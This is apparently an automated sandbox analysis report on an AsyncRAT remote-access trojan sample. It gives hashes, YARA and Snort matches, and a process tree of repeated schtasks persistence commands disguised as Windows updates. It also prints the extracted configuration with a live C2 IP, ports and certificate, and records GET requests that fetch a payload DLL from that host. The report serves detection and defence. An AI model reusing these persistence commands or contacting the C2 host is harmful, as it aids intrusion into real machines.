
Windows Analysis Report
EGSh5caf8a.exe

Overview

General Information

Sample name: EGSh5caf8a.exe (renamed because original name is a hash value)
Original sample name: 712940BAEF78C821E36B8701BF073C52.exe
Analysis ID: 1428675
MD5: 712940baef78c821e36b8701bf073c52
SHA1: d59896b87424fafc0d00ab5e5c2019bd941167ce
SHA256: 08f8498aec75418bb4c12972a6547ee2c4762160e7bf36c558a91b7b9110ed3f
Tags: AsyncRAT, exe, RAT

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 46
Range: 0 - 100

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • EGSh5caf8a.exe (PID: 180 cmdline: "C:\Users\user\Desktop\EGSh5caf8a.exe" MD5: 712940BAEF78C821E36B8701BF073C52)
    • schtasks.exe (PID: 4816 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6748 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6608 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4692 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5856 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2412 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2256 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2924 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5172 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6672 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6452 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5648 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3300 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6192 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3960 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5868 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6220 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6616 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4252 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3092 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5464 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:54 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5468 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2856 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5736 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7268 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7352 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7420 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7476 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7524 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7572 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
{"Ports": ["6606", "7707", "8808"], "Server": ["204.12.199.30"], "Mutex": "Bbtt03i3Zbxo", "Certificate": "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", "Server Signature": "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"}
Source: dump.pcap; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x49803:$x1: AsyncRAT
  • 0x49841:$x1: AsyncRAT
Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp; Rule: Windows_Trojan_Asyncrat_11a11ba1; Description: unknown; Author: unknown
  • 0xa36b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xb698:$a2: Stub.exe
  • 0xb728:$a2: Stub.exe
  • 0x7147:$a3: get_ActivatePong
  • 0xa583:$a4: vmware
  • 0xa3fb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x7ea2:$a6: get_SslClient
Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp; Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse; Description: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
  • 0xa3fd:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp; Rule: Windows_Trojan_Asyncrat_11a11ba1; Description: unknown; Author: unknown
  • 0xbb23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xce38:$a2: Stub.exe
  • 0xcec8:$a2: Stub.exe
  • 0x88ff:$a3: get_ActivatePong
  • 0xbd3b:$a4: vmware
  • 0xbbb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x965a:$a6: get_SslClient
Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack; Rule: Windows_Trojan_Asyncrat_11a11ba1; Description: unknown; Author: unknown
  • 0x7b23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x8e38:$a2: Stub.exe
  • 0x8ec8:$a2: Stub.exe
  • 0x48ff:$a3: get_ActivatePong
  • 0x7d3b:$a4: vmware
  • 0x7bb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x565a:$a6: get_SslClient
Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack; Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse; Description: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
  • 0x7bb5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack; Rule: JoeSecurity_GenericDownloader_1; Description: Yara detected Generic Downloader; Author: Joe Security

            System Summary

            Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST, CommandLine: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\EGSh5caf8a.exe", ParentImage: C:\Users\user\Desktop\EGSh5caf8a.exe, ParentProcessId: 180, ParentProcessName: EGSh5caf8a.exe, ProcessCommandLine: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST, ProcessId: 4816, ProcessName: schtasks.exe
            Timestamp: 04/19/24-11:37:15.963600
            SID: 2030673
            Source Port: 8808
            Destination Port: 49710
            Protocol: TCP
            Classtype: A Network Trojan was detected
            Timestamp: 04/19/24-11:37:15.963600
            SID: 2035595
            Source Port: 8808
            Destination Port: 49710
            Protocol: TCP
            Classtype: A Network Trojan was detected


            AV Detection

            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Ports": ["6606", "7707", "8808"], "Server": ["204.12.199.30"], "Mutex": "Bbtt03i3Zbxo", "Certificate": "MIIE8jCCAtqgAwIBAgIQAOd8JAii5M5++OnIagLrMTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMjI2MDg0MzU2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIOYWpZtR4+pV6eLVgmoW0pmFYYGm9MA+E38jZKadM0mAmNmtr24EWva8gLkn0jY887Tz5347cDo2BpaCAsnAktrEy5d5Bpc1aeAqIb0YCxwMJQGMkE0qwGViGunPUyPzzk6qoqQw/BZPNrQh13JLBN/++Xg5rspfo6GrmqAYpcyoh+nmtbBt/wfQsjrDmZ3TBNCniJX4Ax2lfymDtG/oOlmwo0YXGL/rszP7UxRo0V29mFPG5kEm+346UEZRNeIzf1FV/30VxvyZO8v/PBzVZOyav8MFGZSdo/7y8cdzIWwd+LcUAmZtSxFigD6YRLLwry7klVR0MpzqXqm9V7Cyqlbe04xIV1/UjhdSIDmGqnA8AMp+pwJRZRI3RMhE7HTbjzLULjBoUUTkcMLlIAPmflnfyyyHwxOr9SrHGfyecgDHH0q3/LMgH30jejoUvT2WyQYi5O6PdzX4ifLrQO7JJ6QNd6sihnR0U/IjQRaM0TJay0tQd/R3nHkzNjoBFCu/yBUGVVvFJabfpP14a5PCgQI1qG2JKXd49hK0v0B65ZjDY4vwan+qlP9n+KWeeK6jIg1qnkScg/88vUZKBv8mP6s2cbq+TFHgBoxrxVxIiM3N81tWZC7e6BRBcqORtpngao2N+16NLMsjMCjpY0hTeyQOJP9toGnmyY6Moxs0ciTAgMBAAGjMjAwMB0GA1UdDgQWBBRJpCHBn9DcES+YzHzK1/1Xt6WvWzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAow/Tq1W/Y/rkz41iTb/g5jrpI0VYmar2AH0Gcud9JaLtJ6hs4klWzG/C36xI4ModlwDQqGWTqkhG17pAFwOZV7OPmMqGEXANvDfjrQqu2Zm5YLaMLVVTQNuHKQPAq+n0ILbDre+Rq1oVxxhRCv1Yz/toSe3W3vRefl2GpoPGgwd5xtUnOytoaeFjOyYtXRMDzwbP9bUeSliHCnsBHkhTulMTjKBgJm7cvRw3FqTQAO95qzwIA4eQORnCynTZTM8sLYD597unFJehoZ8MRwEvnhq0od7nUn/JsDVna5mwRbJ413n/XtU7dIZkYvy0gQB0SMS8JPl0T4scz4Xbr0GSoj0YdRQmzlRXcTq9QQVqbE5X3j7voyrfY+fXLdthqeOObS0dALsAkrf6ILiAjr8wCVhW1URzlLBROgRs9swEoilJSdYxbHR9WvI2qw3LekrnZuLzBe8JUUcbDldrZFSUTuPiJYrDLCOQNZRG2uudymPvRqjnNDi9+3g3kzkB4AM7a2qSw+jZW6eXYGUFPeXjBanXsI0MJyNy9APnm3xi95iRqsR8iIqnKWzBqGF1E7LlsfZSn/fs9zZLgZH1CXFtpYxkWItnJdvOWA8q8RlrIZbf9Y7r5vIVwTR5pa+kGhW7Dvn24gaTp22GMRPSVXs1Ye4ztEm8MJbNNja3bUvx64A==", "Server Signature": 
"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"}
            Source: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE; ReversingLabs: Detection: 50%
            Source: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE; Virustotal: Detection: 53%
            Source: EGSh5caf8a.exe; ReversingLabs: Detection: 50%
            Source: EGSh5caf8a.exe; Virustotal: Detection: 53%

            Compliance

            Source: EGSh5caf8a.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: EGSh5caf8a.exe; Static PE information: certificate valid
            Source: EGSh5caf8a.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            Source: Traffic; Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 204.12.199.30:8808 -> 192.168.2.7:49710
            Source: Traffic; Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 204.12.199.30:8808 -> 192.168.2.7:49710
            Source: global traffic; TCP traffic: 204.12.199.30 ports 20991,0,1,2,8808,9
            Source: unknown; Network traffic detected: HTTP traffic on port 49708 -> 20991
            Source: unknown; Network traffic detected: HTTP traffic on port 20991 -> 49708
            Source: unknown; Network traffic detected: HTTP traffic on port 49709 -> 20991
            Source: unknown; Network traffic detected: HTTP traffic on port 20991 -> 49709
            Source: Yara match; File source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: global traffic; TCP traffic: 192.168.2.7:49708 -> 204.12.199.30:20991
            Source: global traffic; HTTP traffic detected: GET /hatthgola.vmp.dll HTTP/1.1; Host: 204.12.199.30:20991; Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET /async.txt HTTP/1.1; Host: 204.12.199.30:20991
            Source: Joe Sandbox View; ASN Name: WIIUS WIIUS
            Source: unknown; TCP traffic detected without corresponding DNS query: 204.12.199.30 (50 identical entries)
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://204.12.199.30:20991
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://204.12.199.30:20991/hatthgola.vmp.dll
            Source: Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://204.12.199.30:20991/hatthgola.vmp.dllC:
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://ocsp.comodoca.com0
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: http://ocsp.sectigo.com0
